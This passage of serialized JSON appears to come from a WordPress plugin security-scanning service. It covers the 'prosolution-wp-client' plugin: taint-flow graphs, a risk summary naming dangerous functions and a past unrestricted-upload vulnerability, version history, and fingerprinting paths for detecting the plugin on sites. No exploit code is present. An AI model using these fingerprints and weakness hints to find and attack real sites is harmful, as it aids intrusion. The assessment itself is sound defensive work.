Write]",486,"file_put_contents",[1566,1567,1568,1569],{"from":1334,"to":1339,"sanitized":49},{"from":1358,"to":1361,"sanitized":49},{"from":1394,"to":1397,"sanitized":49},{"from":1418,"to":1421,"sanitized":49},7,{"entryPoint":1572,"graph":1573,"unsanitizedCount":161,"severity":1548},"\u003Cprosolwpclientjobdetails> (public\u002Ftemplates\u002Fprosolwpclientjobdetails.php:0)",{"nodes":1574,"edges":1579},[1575,1576,1577,1578],{"id":1334,"type":1335,"label":1391,"file":497,"line":1402},{"id":1339,"type":1340,"label":1543,"file":497,"line":746,"wp_function":1545},{"id":1358,"type":1335,"label":1412,"file":497,"line":767},{"id":1361,"type":1340,"label":1388,"file":497,"line":516,"wp_function":1389},[1580,1581],{"from":1334,"to":1339,"sanitized":49},{"from":1358,"to":1361,"sanitized":49},{"summary":1583,"deductions":1584},"The \"prosolution-wp-client\" v2.0.0 plugin exhibits a mixed security posture. On the positive side, it demonstrates good practices by utilizing prepared statements for all SQL queries and incorporates a significant number of nonce and capability checks. The static analysis also shows a relatively contained attack surface with no directly exposed entry points without authentication checks.\n\nHowever, several concerning signals emerge from the code analysis. The presence of dangerous functions like `exec`, `move_uploaded_file`, `ini_set`, and `create_function`, especially when combined with a high number of unsanitized path flows identified in the taint analysis (11 out of 18), suggests potential for severe vulnerabilities. While no critical taint flows were explicitly flagged, the combination of these factors could easily lead to arbitrary file operations or code execution if not handled with extreme care. The output escaping percentage (71%) also leaves room for improvement, potentially introducing XSS vulnerabilities.\n\nThe vulnerability history, though showing no currently unpatched CVEs, reveals a past critical vulnerability related to 'Unrestricted Upload of File with Dangerous Type'. This pattern, coupled with the identified dangerous functions and unsanitized path flows, suggests a recurring area of risk for this plugin. While the current version might be patched for past critical issues, the underlying code patterns indicate a persistent potential for such vulnerabilities to reappear. In conclusion, while the plugin has strengths in its database interaction and authentication checks, the presence of dangerous functions and a history of critical file upload vulnerabilities, coupled with unsanitized path flows, warrant careful scrutiny and a cautious approach to its deployment.",[1585,1588,1590,1592,1595],{"reason":1586,"points":1587},"Dangerous functions present (exec, move_uploaded_file, etc.)",15,{"reason":1589,"points":1587},"Unsanitized path flows in taint analysis (3 critical\u002Fhigh)",{"reason":1591,"points":143},"Output escaping only 71% proper",{"reason":1593,"points":1594},"Past critical vulnerability (Unrestricted Upload)",18,{"reason":1596,"points":1597},"File operations analysis high (47)",5,"2026-04-16T11:17:41.972Z",{"wat":1600,"direct":1613},{"assetPaths":1601,"generatorPatterns":1606,"scriptPaths":1607,"versionParams":1608},[1602,1603,1604,1605],"\u002Fwp-content\u002Fplugins\u002Fprosolution-wp-client\u002Fassets\u002Fcss\u002Fstyle.css","\u002Fwp-content\u002Fplugins\u002Fprosolution-wp-client\u002Fassets\u002Fjs\u002Fscript.js","\u002Fwp-content\u002Fplugins\u002Fprosolution-wp-client\u002Fassets\u002Fcss\u002Fadmin.css","\u002Fwp-content\u002Fplugins\u002Fprosolution-wp-client\u002Fassets\u002Fjs\u002Fadmin.js",[],[1603],[1609,1610,1611,1612],"prosolution-wp-client\u002Fassets\u002Fcss\u002Fstyle.css?ver=","prosolution-wp-client\u002Fassets\u002Fjs\u002Fscript.js?ver=","prosolution-wp-client\u002Fassets\u002Fcss\u002Fadmin.css?ver=","prosolution-wp-client\u002Fassets\u002Fjs\u002Fadmin.js?ver=",{"cssClasses":1614,"htmlComments":1617,"htmlAttributes":1641,"restEndpoints":1643,"jsGlobals":1644,"shortcodeOutput":1646},[1615,1616],"prosolwpclient-settings-page","prosolwpclient-admin-form",[1618,1619,1620,1621,1622,1623,1624,1625,1626,1627,1628,1629,1630,1631,1632,1633,1634,1635,1636,1637,1638,1639,1640],"Plugin Name: ProSolution WP Client","Plugin URI: https:\u002F\u002Fprosolution.com\u002Fprodukte-und-services\u002Fworkexpert.html","Description: WordPress client for ProSolution","Version: 2.0.0","Author: ProSolution","Author URI: https:\u002F\u002Fwww.prosolution.com","License: GPL-2.0+","License URI: http:\u002F\u002Fwww.gnu.org\u002Flicenses\u002Fgpl-2.0.txt","Text Domain: prosolwpclient","Domain Path: \u002Flanguages","\u003C!-- Currently pligin version.","\u003C!-- Start at version 1.0.0 and use SemVer - https:\u002F\u002Fsemver.org","\u003C!-- Rename this for your plugin and update it as you release new versions.","\u003C!-- If this file is called directly, abort.","\u003C!-- Encrypt and decrypt","\u003C!-- Reference: https:\u002F\u002Fwww.geeksforgeeks.org\u002Fhow-to-encrypt-and-decrypt-a-php-string\u002F","\u003C!-- Filters a plugin's locale.","\u003C!-- Detect browser language.","\u003C!-- Use $_SERVER['HTTP_ACCEPT_LANGUAGE'] if no language variable is available","\u003C!-- Any info sent?","\u003C!-- Use random_bytes() function to generate a random initialization vector (iv)","\u003C!-- Alternatively, you can use a fixed iv if needed","\u003C!-- Use php_uname() as the encryption key",[1642],"data-prosolwpclient-nonce",[],[1645],"window.prosolwpclient_ajaxurl",[],{"slug":4,"current_version":6,"total_versions":1648,"versions":1649},2,[1650,1655],{"version":6,"download_url":25,"svn_tag_url":1651,"released_at":36,"has_diff":49,"diff_files_changed":1652,"diff_lines":36,"trac_diff_url":1653,"vulnerabilities":1654,"is_current":65},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fprosolution-wp-client\u002Ftags\u002F2.0.0\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fprosolution-wp-client%2Ftags%2F1.9.9&new_path=%2Fprosolution-wp-client%2Ftags%2F2.0.0",[],{"version":1656,"download_url":1657,"svn_tag_url":1658,"released_at":36,"has_diff":49,"diff_files_changed":1659,"diff_lines":36,"trac_diff_url":36,"vulnerabilities":1660,"is_current":49},"1.9.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fprosolution-wp-client.1.9.9.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fprosolution-wp-client\u002Ftags\u002F1.9.9\u002F",[],[1661],{"id":32,"url_slug":33,"title":34,"severity":38,"cvss_score":39,"vuln_type":41,"patched_in_version":6}]